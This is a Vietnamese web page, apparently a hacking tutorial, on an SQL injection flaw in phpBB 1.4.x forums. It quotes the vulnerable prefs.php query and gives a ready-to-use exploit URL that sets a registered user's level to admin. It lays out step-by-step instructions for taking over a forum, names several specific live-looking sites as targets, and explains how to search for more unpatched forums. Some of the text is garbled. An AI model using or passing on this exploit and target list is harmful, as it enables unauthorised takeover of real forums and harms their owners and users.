Đang tải... (xem toàn văn)
Lỗi trong Php 1.4.x có phép đoạt quyền Admin
Lỗi phpBB 1.4.x có phép đoạt quyền Admin : trang đọc lần Các forum phpBB 1.4.x có lỗi nghiêm trọng cho phép user bình thường chạy đoạn lệnh cho phép cập nhật vài thơng tin preferences để có quyền admin Một số lỗi tìm thấy đoạn code sau: < Example sql query in prefs.php > $sql = "UPDATE users SET user_viewemail='$viewemail', user_theme='$themes', user_attachsig = '$sig', user_desmile = '$smile', user_html = '$dishtml', user_bbcode = '$disbbcode', user_lang = '$lang' WHERE (user_id = '$userdata[user_id]'"; Để khai thác, ta chạy lệnh modify prefereces file prefx.php, cách xác định giá trị cụ thể cho biến viewemail Vd sau đặt cho username maxx có quyền admin (privilege level 4): http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where %20username%3D'maxx'%23 Lệnh chạy lệnh sql cập nhật thông tin viewemail đồng thời user_level Như vậy, bước cần thiết để thử test hack forum dạng sau: - Đăng kí acc - Login vào với acc vừa đăng kí - Chạy link vd - Nếu thiết lập preferences thành công (ko báo lỗi), bạn return lại forum index vào Administration Panel cuối forum Lưu ý có vài forum sau set preferences thành công, ko thấy Administration Panel, bạn thử vào theo link sau: /phpBBfolder/admin/index.php (như forum pregnancy.org dưới) Một vài forum thử nghiệm: http://tuxedox2.dyndns.org/phpBB/index.php http://www.pregnancy.org/phpBB/index.php http://webraovat.com/phpBB/ Các bạn tìm thêm forum phpBB 1.4.x chưa fix net, search theo từ khóa ví dụ như: "powered phpbb 1.4.0"